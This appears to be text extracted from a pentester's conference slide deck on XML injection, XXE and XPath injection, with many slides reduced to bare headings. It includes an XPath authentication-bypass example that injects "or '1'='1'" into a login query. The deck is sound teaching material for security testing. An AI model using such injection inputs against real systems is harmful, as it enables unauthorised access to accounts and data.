Lesser Known Injections XML Injections AMol NAik About
Lesser Known Injections XML Injections AMol NAik
About me Web Application Pentester. Core member of Garage 4 Hackers. Bounty Hunter in past. Currently fuzzing browsers for Fun & Profit
Garage 4 Hackers Family of 3, 800, posts 8 k+40+ best Bug Bounty submissions 15+ browser bugs in Chrome, IE, FF & Safari. ASLR bypass method presented at Can. Sec. West was already shared on G 4 H forum 5+ Information Security Research (cable TV & Datacard)10+ Tools & scripts, 1+ Web application CTFRanchhoddas Webcast Series – 5+ webinars. Follow us on Twitter @garage 4 hackers
Agenda XML Basic. XML Injection. XXE Attack. XPath Basics. XPath Injections
XXE is a the new SQL Injection - Someone on Twitter
XML Injection in Real-World Yandex pwned for $5000 with XXE by @d 0 znpp. Open. ID XXE by Reginaldo Silva. Multiple XXE bugs by @Securatary team. XXE in Google Toolbar by Detectify team - $10 k
XML Basics
XML Basics e. Xtensible Markup Language. Flexible textbased format. Presents structured info. Used for Data Exchange/Storage
XML Components
XML – CDATA Section Tells parser not to use markup for characters in this section. Examples:
XML Injections
XML Injections Injection Points
XML Injection – Node Attribute
XML Injection – Node Attribute
XML Injection – Node Value
XML Injection – Node Value
XML Injection – CDATA Section
XML Injection – CDATA Section
XXE Attack
XML Entity Variable. Define Can be Internal/External
XML Entity
XXE Attack
XPath Basics Language to select XML Nodes. Formats XML data as tree-structured values. Similar as SQL (in some sense)
XPath Syntax Uses path expressions to select nodes or node -sets in an xml document Expression Description nodename Selects all child nodes of the named node / Selects from root node // Selects nodes from the current node that match the selection no matter where they are . Selects current node . . Selects parent of the current node
XPath Predicates Used to find a specific node or a node that contain specific value. Always embedded in square brackets
XPath Predicates Expression Result /Employees/Employee[1] Selects first ‘Employee’ element that is the child of ‘Employees’ element /Employees/Employee[last()] Selects last ‘Employee’ element that is the child of ‘Employees’ element /Employees/Employee[position()<3] Selects first 2 ‘Employee’ elements that are children of Employees element //Employee[@ID=‘ 1’] Selects all the ‘Employee’ elements that have an attribute named ‘ID’ with a value of ‘ 1’
XPath Location Path Syntax: axisname: : nodetest[predicate]
XPath Location Path Example Result child: : Employee Selects all ‘Employee’ node that are children of the current node attribute: : id Selects the id attribute of the current node child: : * Selects all children of the current node attribute: : * Selects all attributes of the current node child: : text() Selects all text child nodes of the current node child: : node() Selects all child nodes of the current node descendant: : Employees Selects all ‘Employees’ descendants of the current node
XPath Injection XPath Query: /Employees/Employee[User. Name/text() = ‘user’ and Password/text() = ‘passwd’]/Type/text()
XPath Injection No User. Name & Password known:
XPath Injection User. Name known: /Employees/Employee[User. Name/text() = ‘mbrown’ or ‘ 1’=‘ 1’ and Password/text() = ‘anything’]Type/text()
XPath Injection No User. Name & Password known & Password is not vulnerable:
Conclusion XML Injections are ignored. Many sites having these issues
That's It !! AMol NAik @amolnaik 4 mailto: amolnaik 4@garage 4 hackers. com
References XPath Injection. Hacking XPath 2. 0 Blind XPath Injection
- Slides: 35